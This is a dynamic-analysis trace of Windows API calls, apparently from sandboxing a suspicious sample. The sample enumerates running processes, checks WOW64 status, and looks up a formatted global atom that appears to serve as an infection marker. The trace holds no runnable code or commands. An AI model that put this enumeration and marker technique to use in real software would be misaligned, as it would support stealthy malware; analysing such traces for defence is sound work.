	[0073.050] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.050] CloseHandle (hObject=0x224) returned 1
	[0073.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0073.050] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0073.050] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.050] CloseHandle (hObject=0x224) returned 1
	[0073.050] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x772188, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.050] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0073.050] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.050] CloseHandle (hObject=0x224) returned 1
	[0073.051] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x7721a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0073.051] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0073.051] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.051] CloseHandle (hObject=0x224) returned 1
	[0073.051] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x72ea18, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0073.051] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0073.051] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.051] CloseHandle (hObject=0x224) returned 1
	[0073.051] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x772158, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0073.051] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0073.051] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.051] CloseHandle (hObject=0x224) returned 1
	[0073.051] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x772188, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0073.051] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0073.051] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.051] CloseHandle (hObject=0x224) returned 1
	[0073.051] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x7287f8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0073.051] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0073.051] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.051] CloseHandle (hObject=0x224) returned 1
	[0073.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x7721a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.052] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0073.052] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.052] CloseHandle (hObject=0x224) returned 1
	[0073.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x7287f8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0073.052] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0073.052] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.052] CloseHandle (hObject=0x224) returned 1
	[0073.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x72e8b0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0073.052] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0073.052] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.052] CloseHandle (hObject=0x224) returned 1
	[0073.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x72ea18, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0073.052] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0073.054] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.054] CloseHandle (hObject=0x224) returned 1
	[0073.054] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x772200, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0073.054] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0073.054] GetLastError () returned 0x5
	[0073.055] GetLastError () returned 0x5
	[0073.055] GetLastError () returned 0x5
	[0073.055] GetLastError () returned 0x5
	[0073.055] GetLastError () returned 0x5
	[0073.055] GetLastError () returned 0x5
	[0073.055] GetLastError () returned 0x5
	[0073.055] GetLastError () returned 0x5
	[0073.055] GetLastError () returned 0x5
	[0073.055] GetLastError () returned 0x5
	[0073.055] GetLastError () returned 0x5
	[0073.055] GetLastError () returned 0x5
	[0073.055] GetLastError () returned 0x5
	[0073.055] GetLastError () returned 0x5
	[0073.055] GetLastError () returned 0x5
	[0073.055] GetLastError () returned 0x5
	[0073.055] GetLastError () returned 0x5
	[0073.055] GetLastError () returned 0x5
	[0073.055] GetLastError () returned 0x5
	[0073.055] GetLastError () returned 0x5
	[0073.055] GetLastError () returned 0x5
	[0073.055] GetLastError () returned 0x5
	[0073.055] GetLastError () returned 0x5
	[0073.055] GetLastError () returned 0x5
	[0073.055] GetLastError () returned 0x5
	[0073.055] GetLastError () returned 0x5
	[0073.055] GetLastError () returned 0x5
	[0073.055] GetLastError () returned 0x5
	[0073.055] GetLastError () returned 0x5
	[0073.055] GetLastError () returned 0x5
	[0073.055] GetLastError () returned 0x5
	[0073.055] GetLastError () returned 0x5
	[0073.055] GetLastError () returned 0x5
	[0073.055] GetLastError () returned 0x5
	[0073.055] GetLastError () returned 0x5
	[0073.055] GetLastError () returned 0x5
	[0073.055] GetLastError () returned 0x5
	[0073.055] GetLastError () returned 0x5
	[0073.055] GetLastError () returned 0x5
	[0073.055] GetLastError () returned 0x5
	[0073.055] GetLastError () returned 0x5
	[0073.055] GetLastError () returned 0x5
	[0073.055] GetLastError () returned 0x5
	[0073.055] GetLastError () returned 0x5
	[0073.055] GetLastError () returned 0x5
	[0073.055] GetLastError () returned 0x5
	[0073.055] GetLastError () returned 0x5
	[0073.055] GetLastError () returned 0x5
	[0073.055] GetLastError () returned 0x5
	[0073.055] GetLastError () returned 0x5
	[0073.055] GetLastError () returned 0x5
	[0073.055] GetLastError () returned 0x5
	[0073.055] GetLastError () returned 0x5
	[0073.055] GetLastError () returned 0x5
	[0073.055] GetLastError () returned 0x5
	[0073.055] GetLastError () returned 0x5
	[0073.055] GetLastError () returned 0x5
	[0073.055] GetLastError () returned 0x5
	[0073.056] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0073.056] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0073.056] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0073.056] GetLastError () returned 0x5
	[0073.056] GetLastError () returned 0x5
	[0073.056] GetLastError () returned 0x5
	[0073.056] GetLastError () returned 0x5
	[0073.056] GetLastError () returned 0x5
	[0073.056] GetLastError () returned 0x5
	[0073.056] GetLastError () returned 0x5
	[0073.056] GetLastError () returned 0x5
	[0073.056] GetLastError () returned 0x5
	[0073.056] GetLastError () returned 0x5
	[0073.056] GetLastError () returned 0x5
	[0073.056] GetLastError () returned 0x5
	[0073.056] GetLastError () returned 0x5
	[0073.056] GetLastError () returned 0x5
	[0073.056] GetLastError () returned 0x5
	[0073.056] GetLastError () returned 0x5
	[0073.056] GetLastError () returned 0x5
	[0073.056] GetLastError () returned 0x5
	[0073.056] GetLastError () returned 0x5
	[0073.056] GetLastError () returned 0x5
	[0073.056] GetLastError () returned 0x5
	[0073.056] GetLastError () returned 0x5
	[0073.056] GetLastError () returned 0x5
	[0073.056] GetLastError () returned 0x5
	[0073.056] GetLastError () returned 0x5
	[0073.056] GetLastError () returned 0x5
	[0073.056] wsprintfA (in: param_1=0x770458, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0073.056] GetLastError () returned 0x5
	[0073.056] GetLastError () returned 0x5
	[0073.056] GetLastError () returned 0x5
	[0073.056] GetLastError () returned 0x5
	[0073.056] GetLastError () returned 0x5
	[0073.056] GetLastError () returned 0x5
	[0073.056] GetLastError () returned 0x5
	[0073.056] GetLastError () returned 0x5
	[0073.056] GetLastError () returned 0x5
	[0073.057] GetLastError () returned 0x5
	[0073.057] GetLastError () returned 0x5
	[0073.057] GetLastError () returned 0x5
	[0073.057] GetLastError () returned 0x5
	[0073.057] GetLastError () returned 0x5
	[0073.057] GetLastError () returned 0x5
	[0073.057] GetLastError () returned 0x5
	[0073.057] GetLastError () returned 0x5
	[0073.057] GetLastError () returned 0x5
	[0073.057] GetLastError () returned 0x5
	[0073.057] GetLastError () returned 0x5
	[0073.057] GetLastError () returned 0x5
	[0073.057] GetLastError () returned 0x5
	[0073.057] GetLastError () returned 0x5
	[0073.057] GetLastError () returned 0x5
	[0073.057] GetLastError () returned 0x5
	[0073.057] GetLastError () returned 0x5
	[0073.057] GetLastError () returned 0x5
	[0073.057] GetLastError () returned 0x5
	[0073.057] GetLastError () returned 0x5
	[0073.057] GetLastError () returned 0x5
	[0073.057] GetLastError () returned 0x5
	[0073.057] GetLastError () returned 0x5
	[0073.057] GetLastError () returned 0x5
	[0073.057] GetLastError () returned 0x5
	[0073.057] GetLastError () returned 0x5
	[0073.057] GetLastError () returned 0x5
	[0073.057] GetLastError () returned 0x5
	[0073.057] GetLastError () returned 0x5
	[0073.057] GetLastError () returned 0x5
	[0073.057] GetLastError () returned 0x5
	[0073.057] GetLastError () returned 0x5
	[0073.057] GetLastError () returned 0x5
	[0073.057] GetLastError () returned 0x5
	[0073.057] GetLastError () returned 0x5
	[0073.057] GetLastError () returned 0x5
	[0073.057] GetLastError () returned 0x5
	[0073.057] GetLastError () returned 0x5
	[0073.057] GetLastError () returned 0x5
	[0073.057] GetLastError () returned 0x5
	[0073.057] GetLastError () returned 0x5
	[0073.057] GetLastError () returned 0x5
	[0073.057] GetLastError () returned 0x5
	[0073.057] GetLastError () returned 0x5
	[0073.057] GetLastError () returned 0x5
	[0073.057] GetLastError () returned 0x5
	[0073.057] GetLastError () returned 0x5
	[0073.057] GetLastError () returned 0x5
	[0073.057] GetLastError () returned 0x5
	[0073.057] GetLastError () returned 0x5
	[0073.057] GetLastError () returned 0x5
	[0073.057] GetLastError () returned 0x5
	[0073.057] GetLastError () returned 0x5
	[0073.058] GetLastError () returned 0x5
	[0073.058] GetLastError () returned 0x5
	[0073.058] GetLastError () returned 0x5
	[0073.058] GetLastError () returned 0x5
	[0073.058] GetLastError () returned 0x5
	[0073.058] GetLastError () returned 0x5
	[0073.058] GetLastError () returned 0x5
	[0073.058] GetLastError () returned 0x5
	[0073.058] GetLastError () returned 0x5
	[0073.058] GetLastError () returned 0x5
	[0073.058] GetLastError () returned 0x5
	[0073.058] GetLastError () returned 0x5
	[0073.058] GetLastError () returned 0x5
	[0073.058] GetLastError () returned 0x5
	[0073.058] GetLastError () returned 0x5
	[0073.058] GetLastError () returned 0x5
	[0073.058] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0073.058] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0073.058] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0073.058] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0073.058] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0073.058] CloseHandle (hObject=0x224) returned 1
	[0073.058] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0073.058] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x7721b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.058] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0073.058] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.059] CloseHandle (hObject=0x224) returned 1
	[0073.059] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x72ea18, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0073.059] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0073.059] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.059] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0073.059] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.059] CloseHandle (hObject=0x224) returned 1
	[0073.059] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x772170, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0073.091] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16e08) returned 0xc0000004
	[0073.092] VirtualAlloc (lpAddress=0x0, dwSize=0x16f08, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0073.092] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x16f08, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0073.104] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0073.104] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x772200, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0073.104] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0073.104] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x7721a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0073.104] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0073.104] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.104] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0073.104] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x7721d0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0073.104] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0073.104] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.104] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0073.104] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x772218, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.104] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0073.105] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x772188, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0073.105] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0073.105] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.105] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0073.105] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.105] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0073.105] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dc50, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0073.105] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0073.105] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.105] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0073.105] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.105] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0073.105] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.105] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0073.106] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.106] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0073.106] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.106] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0073.106] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.106] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0073.106] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.106] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0073.106] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.106] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0073.106] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.106] CloseHandle (hObject=0x224) returned 1
	[0073.106] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x772188, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0073.106] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0073.106] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.107] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0073.107] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x7287f8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0073.107] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0073.107] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.107] CloseHandle (hObject=0x224) returned 1
	[0073.107] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x728a98, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0073.107] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0073.107] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.107] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0073.107] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.107] CloseHandle (hObject=0x224) returned 1
	[0073.107] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772158, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.107] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0073.107] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.107] CloseHandle (hObject=0x224) returned 1
	[0073.107] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x7721a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.108] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0073.108] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.108] CloseHandle (hObject=0x224) returned 1
